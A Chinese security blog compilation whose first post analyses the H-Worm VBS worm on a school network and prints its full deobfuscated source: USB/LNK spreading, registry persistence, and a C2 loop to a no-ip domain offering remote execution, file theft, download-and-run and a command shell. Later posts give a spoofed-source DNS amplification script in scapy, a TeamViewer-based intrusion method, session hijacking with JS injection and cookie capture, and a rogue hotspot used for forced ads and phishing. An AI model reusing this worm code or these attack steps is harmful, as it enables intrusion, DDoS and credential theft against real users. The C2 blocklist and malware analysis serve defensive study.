H-Worm 校内传播报告

事件起因

据说是由某历史老师从国外带回,在校园内广泛传播,阶梯教室、图书馆等公共计算机成为其重灾区,且 360 无法清除该恶意脚本。

样本分析

样本名

fuck girlMagazines +18 (3).vbs

类别

Virus.Vbs.Crypt.C

行为分析

将设备内所有文件移动到 360SANDBOX 隐藏目录,并为全部文件在原位置建立快捷方式。当用户访问文件时,会先通过快捷方式执行脚本,再访问真实文件来迷惑用户。

脚本代码

源文件:fuck girlMagazines +18 (3)
经过两次 Base64 Decode 以及 ASCII 码替代混淆,我们得到了原始脚本。(感谢 RuanXingZhi 协助解析脚本)

'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "mmoohhaammeedd.no-ip.biz"
port = 12
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver  
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)  
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
     osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
        .type = 1 
        .open
        .write objhttpdownload.responsebody
        .savetofile strsaveto
        .close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
    set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
         .type = 1 
         .open
         .write objhttpdownload.responsebody
         .savetofile strsaveto
         .close
    end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
     .loadfromfile fileurl
     buffer = .read
     .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
    enumprocess = enumprocess & objitem.name & "|"
    enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function

通过阅读源码我们发现,这是一款功能齐全的远控脚本,提供了上传/下载/CMD等多种功能。
脚本作者:houdini
连接域名:mmoohhaammeedd.no-ip.biz
监听端口:12
感染特征:免费动态域名+非知名的端口+“/is-ready”

我们拿到了 H-Worm 控制端,界面很美观,功能很强大,还可以自身更新、卸载,赞。
事后(2016-8)我们通过查阅发现,2016-7-1 360 发布了关于 H-Worm 的漏洞报告(H-WORM:简单而活跃的远控木马),其中提到了以下 C&C 服务器地址,建议各网络管理员拉黑处理。

zzzch.zapto.org
ysf.no-ip.biz
ycemufkk6g.bounceme.net
xxx-xxx.no-ip.info
xkiller.no-ip.info
wach.no-ip.org
tariqalr.zapto.org
shagagy21.no-ip.biz
sexcam.3utilities.com
servecounterstrike.servecounterstrike.com
playgame.servecounterstrike.com
p-dark.zapto.org
nouna1985.no-ip.org
n0it.no-ip.org
mzab47.myq-see.com
modox.no-ip.org
mmoohhaammeedd.no-ip.biz
mlcrosoft.serveftp.com
microsoftupgrades.servehttp.com
microsoftsystem.sytes.net
micr0s0ftsoft.myftp.org
mda.no-ip.org
maroco.redirectme.net
maroco.myq-see.com
maroco.linkpc.net
man2010.no-ip.org
korom.zapto.org
koko.myftp.org
klonkino.no-ip.org
king.servemp3.com
herohero.no-ip.org
hacker20133.no-ip.org
googlechrome.servequake.com
g00gle.sytes.net
dzhacker15.no-ip.org
dz47.servehttp.com
dz47.myq-see.com
dz47.linkpc.net
dream7.no-ip.biz
diiimaria.zapto.org
desha10.no-ip.org
dataday3.no-ip.org
darkanony0501.no-ip.biz
cupidon.zapto.org
chrom.no-ip.info
bog5151.zapto.org
blackmind.redirectme.net
albertino.no-ip.info
adolf2013.sytes.net
adamdam.zapto.org

处理方法

禁用 Autorun.inf,删除 *.lnk,选择主流安全软件。

参考文献

[1]Fireeye – Now you see me H-Worm by Houdini

后记

2014/12/26 本文发布
2014/12/** 学校网络中心称此问题无法解决
2016/08/11 更新内容与脚本

DNS放大攻击原理及实现

原理

一般的DNS查询是基于UDP(53)的,具有源不可验证性。(相反的,TCP协议是三步握手连接,所以是可以信任的)
而当我们伪装一个src = '192.168.1.2',dst = '192.168.1.1'的DNS Query时,192.168.1.1将返回Respone给192.168.1.2。所以,我们可以通过伪装大量这样的Query,通过拥有高带宽的DNS服务器对src发起攻击。

然而,事实上,这就是普通的UDP攻击,但它与之的新特性是,DNS放大攻击的危害更大。传统的UDP攻击效果取决于攻击者的攻击带宽,而新型的DNS放大攻击取决于DNS服务器的带宽。(在这种关系下,DNS服务器既是攻击者,也是受害者)

比如我们向某递归DNS 服务器发送一个类型为ANY的域名查询请求(64 byte),然后收到了820 byte的Respone。

[email protected]:~#dig any isc.org @61.187.***.***
;; Truncated, retrying in TCP mode.

; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> any isc.org @61.187.***.***
;; global options: +cmd
;; Got answer:
;; ->>HEADER< ;; flags: qr rd ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 10

;; QUESTION SECTION:
;isc.org. IN ANY

;; ANSWER SECTION:
isc.org. 40 IN A 149.20.64.69
isc.org. 7030 IN NS sfba.sns-pb.isc.org.
isc.org. 7030 IN NS ord.sns-pb.isc.org.
isc.org. 7030 IN NS ns.isc.afilias-nst.info.
isc.org. 7030 IN NS ams.sns-pb.isc.org.
isc.org. 7030 IN SOA ns-int.isc.org. hostmaster.isc.org. 2015050900 7200 3600 24796800 3600
isc.org. 7030 IN MX 10 mx.pao1.isc.org.
isc.org. 7030 IN MX 10 mx.ams1.isc.org.
isc.org. 7030 IN TXT "v=spf1 a mx ip4:204.152.184.0/21 ip4:149.20.0.0/16 ip6:2001:04F8::0/32 ip6:2001:500:60::65/128 ~all"
isc.org. 7030 IN TXT "$Id: isc.org,v 1.1979 2015-05-04 19:31:54 jquale Exp $"
isc.org. 40 IN AAAA 2001:4f8:0:2::69
isc.org. 7030 IN NAPTR 20 0 "S" "SIP+D2U" "" _sip._udp.isc.org.
isc.org. 7030 IN SPF "v=spf1 a mx ip4:204.152.184.0/21 ip4:149.20.0.0/16 ip6:2001:04F8::0/32 ip6:2001:500:60::65/128 ~all"

;; ADDITIONAL SECTION:
sfba.sns-pb.isc.org. 7030 IN A 149.20.64.3
sfba.sns-pb.isc.org. 7030 IN AAAA 2001:4f8:0:2::19
ord.sns-pb.isc.org. 7030 IN A 199.6.0.30
ord.sns-pb.isc.org. 7030 IN AAAA 2001:500:71::30
ams.sns-pb.isc.org. 7030 IN A 199.6.1.30
ams.sns-pb.isc.org. 7030 IN AAAA 2001:500:60::30
mx.pao1.isc.org. 3430 IN A 149.20.64.53
mx.pao1.isc.org. 3430 IN AAAA 2001:4f8:0:2::2b
mx.ams1.isc.org. 3430 IN A 199.6.1.65
mx.ams1.isc.org. 3430 IN AAAA 2001:500:60::65

;; Query time: 12 msec
;; SERVER: 61.187.***.***#53(61.187.***.***)
;; WHEN: Sun May 10 10:03:15 2015
;; MSG SIZE rcvd: 820

由于DNS查询请求通常为无连接的UDP类型,所以攻击者只要使用1G的伪造源地址DNS查询流量,理论上就可能获得超过50G的UDP流量,并且可以控制其流向导引到攻击目标。对于拥有成千上万台被控主机的僵尸木马网络来说,发出几个G乃至数十G的DNS查询流量并不困难,而开放式递归服务器在全球数量超过千万台,并且这些服务器接入带宽往往较高。如果控制每台 DNS只产生 30M的应答攻击流量(太大的 DNS流量会被管理员发现并可能影响服务器正常工作),那么只需要1万台就可以达到300G DDoS流量攻击的效果。
——上海交通大学网络信息中心

危害

  • 伪造的src主机会收到大量的Respone造成拒绝响应
  • 目标DNS服务可能瘫痪,且上级DNS服务器进行递归查询,可能会耗尽资源

筛选

放大倍数越大,DNS放大攻击的效果越明显,显然,我们需要通过寻求一些域名记录较多的域名进行查询,如 isc.org, GitHub.com, Google.com, Logdown.com, SourceForgenet,当然,一些较常用的,可能已经被列入DNS查询白名单的域名也是很好的选择,如 Baidu.com, Gov.cn之类的。

实现

由于Python简单上手模块多,所以我们选择Python作为我们的开发语言。(这就是为什么那么多EXP都用Python的缘故吧)

from scapy.all import *
a = IP(dst='',src='')
b = UDP(dport='53')
c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)
c.qd=DNSQR(qname='domain',qtype=1,qclass=1)
p = a/b/c
send(p,count=case)

此时,src主机就会收到case条DNS Respone。

进阶

  • 参考DNS协议报文格式,发送类型为ANY的Query试试
  • 尝试索引 *.3322.org, *.oicp.net, *.eicp.net, *.xicp.net进行递归查询防止被ban

常用DNS服务器

OneDNS 112.124.47.27
OpenerDNS 42.120.21.30
aliDNS 223.5.5.5,223.6.6.6
114DNS 114.114.114.114,114.114.115.115
114DNS安全版 114.114.114.119,114.114.115.119
114DNS家庭版 114.114.114.110,114.114.115.110(推介)

防治

基于TeamViewer的一种渗透新思路

环境

Microsoft(R) Windows(R) Server 2003, Enterprise Edition 5.2.3790 Service Pack 2 Build 3790
补丁数 358
防护软件 360Safe QQPCMgr
位于内网,路由上穿透了80端口
当前权限为 SYSTEM
TeamViewer版本 8.0

思路

传远控是行不通的了,在半个多月之前一次失败的执行后,管理员变更了用户权限以及密码。管理员变更了默认的 RDP 服务端口,但因为网管不懂得修复,提示”由于协议错误,会话将被中断,请重新连接到远程服务器”。能不能试试将 TeamViewer 作为入口呢?

答案是可以的。

\Program Files\TeamViewer\中,我们能够找到 Logfile.log,先 down 下来慢慢分析。
从底部开始寻找 “From:” “To:” 字样,后面接着的是 TeamViewer ID,要么是当前服务器,要么是从当前服务器访问出去的客户机。
打开自己的 TeamViewer 账户,将该 ID 添加到自己的账户中。

然后双击连接吧 🙂 有的管理员会选择 “使用Windows账户登录”,那么就达成了目标。
但若没有…

从终端执行 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\TeamViewer\Version8"遍历显示当前目录的键值。
找到 “Security_WinLogin” 项,如果没有则用 “reg add” 添加,”1″ 仅允许管理员,”2″ 允许所有用户,类为 REG_DWORD。
Kill TeamViewer then restart.

Done.

优点

不容易被察觉,自带免杀,不会暴露ip

缺点

容易被正在线上的网管察觉,前功尽弃

DNS会话劫持

拿下了 DHCP 服务后,自己有了更深的思考…QQ图片20150217123340能不能获取到一些内网的连接信息呢?

0x00 攻击准备

系统:Kali(KVM下),Windows XP(实体机)。
网络:主机位于同一子网(只要能互访就行)。
套件:Node.Js,Closurether。

0x01 安装

wget http://nodejs.org/dist/v0.8.7/node-v0.8.7.tar.gz //下载
tar zxvf node-v0.8.7.tar.gz //解压
./configure
make //编译
make install //安装
npm install -g closurether //安装

到这一步时,一般都会报错。

SSL Error: SELF_SIGNED_CERT_IN_CHAIN

symlinking ../lib/node_modules/npm/bin/npm-cli.js -> /usr/local/bin/npm
updating shebang of /usr/local/bin/npm to /usr/local/bin/node
[email protected]:~/node-v0.8.7# npm install -g closurether
npm http GET https://registry.npmjs.org/closurether
npm http GET https://registry.npmjs.org/closurether
npm http GET https://registry.npmjs.org/closurether
npm ERR! Error: SSL Error: SELF_SIGNED_CERT_IN_CHAIN
npm ERR!     at ClientRequest. (/usr/local/lib/node_modules/npm/node_modules/request/main.js:440:26)
npm ERR!     at ClientRequest.g (events.js:185:14)
npm ERR!     at ClientRequest.EventEmitter.emit (events.js:88:17)
npm ERR!     at HTTPParser.parserOnIncomingClient [as onIncoming] (http.js:1455:

解决方案

[email protected]:~/node-v0.8.7# npm install npm -g --ca=null
npm http GET https://registry.npmjs.org/npm
npm http 200 https://registry.npmjs.org/npm
npm http GET https://registry.npmjs.org/npm/-/npm-1.4.26.tgz
npm http 200 https://registry.npmjs.org/npm/-/npm-1.4.26.tgz
/usr/local/bin/npm -> /usr/local/lib/node_modules/npm/bin/npm-cli.js
[email protected] /usr/local/lib/node_modules/npm
[email protected]:~/node-v0.8.7# npm config set ca=""

然后执行

closurether //开启DNS代理

0x02 配置

找到路径 “/usr/local/lib/node_modules/closurether/asset/inject”,找到 extern.js。在尾部加上 JavaScript 代码,就能自动注入至 HTTP 消息中。
在”/usr/local/lib/node_modules/closurether/tool/cache-sniffer”的 url.txt 中可以指定注入的URL。
指定伪造的 JS 源可以在 config.json 中配置。

0x03 会话劫持

执行

tcpdump -i 网卡 -w filename(.cap)

然后用ferret处理生成的cap文件 自动在目录会长成一个hamster.txt。

ferret -r filename

启用 hamster 代理

hamster

0x03 urlsnarf劫持

urlsnarf

tips:开启urlsnarf会阻碍SSL连接,所以最好还是不要用咯。

End.
大部分内容习自 [email protected]

动手DIY商用营销WiFi热点

本来是为了亲身尝试一下 WiFi ,拿出了一年前购买的大功率板载定向网卡。
我是个忠实的 Windows 党,可 Windows 太任性,“360免费WiFi”太黑心,打着“硬件不支持”的原因不允许用户更改大部分WiFi设置,便看中了“猎豹免费Wifi”。

先走正常程序安装完毕。

我看到http://hi.liebao.cn:8735时,我还以为猎豹把本地配置存在云端了,心想这下可能搞不定了。
谁知,我ping了一下 hi.liebao.cn ,发现并不存在这个域名。再一看本地监听端口
映像      PID   地址          端口   协议        防火墙状态
kwifi.exe 1520 未指定 IPv4   8735    TCP      允许,不受限制

瞬间就明白了,原来猎豹在本地弄了个 DNS 服务器。

随后,软件提示从 “http://hi.liebao.cn:8735” 访问欢迎页面。
p.s.若是想将页面显示于80端口,用一个简单的端口转发 Shell 就可以了。

如果只是想改头像——
我们找到以下路径

Drive:\Install Path\kingsoft\kwifi\data\httproot\static\css\images
其中的 my1.jpg ~ my4.jpg 为不同模板的人物图片,可以自行替换。

如果想更改整个页面——
Drive:\Install Path\kingsoft\kwifi\data\httproot\httproot.html
这便是主页。
猎豹自建的 HTTP 服务貌似仅支持 HTML 解析,并不支持 Asp/PHP ,所以我们并不能基于它实现太多的营销功能。
但是我们可以这样

<script language="javascript">
     window.open ('广告联盟1')
   window.open ('广告联盟2') 
   window.open ('广告联盟3')
</script>

一旦用户访问页面,便会啪啪啪弹一堆广告。(反正移动端没弹窗拦截)

考虑到 Coolpad 等奇葩厂商加入了弹窗拦截功能,我们可以利用上网心切的思想,使用

<a href="推广链接" >点击上网</a>

的简单方法,促使用户自主点击。

另外,也可以本机跑一个 IIS ,进行 CMCC/ChinaNet/AirPort 钓鱼。
此外,我估计 kwifidev.dat 中存储了 DNS 解析配置信息以及其他的内容,对此不太了解,所以没有深入。(也可以拿来钓鱼)

也许是因为供电只有 0.5A 的原因,网卡并不稳定,考虑外接 1A 供电。

啊,感觉偏题了。

_(:3_J/)_ 本文仅供技术交流,切勿实践。

一定不要连接不信任的WiFi热点!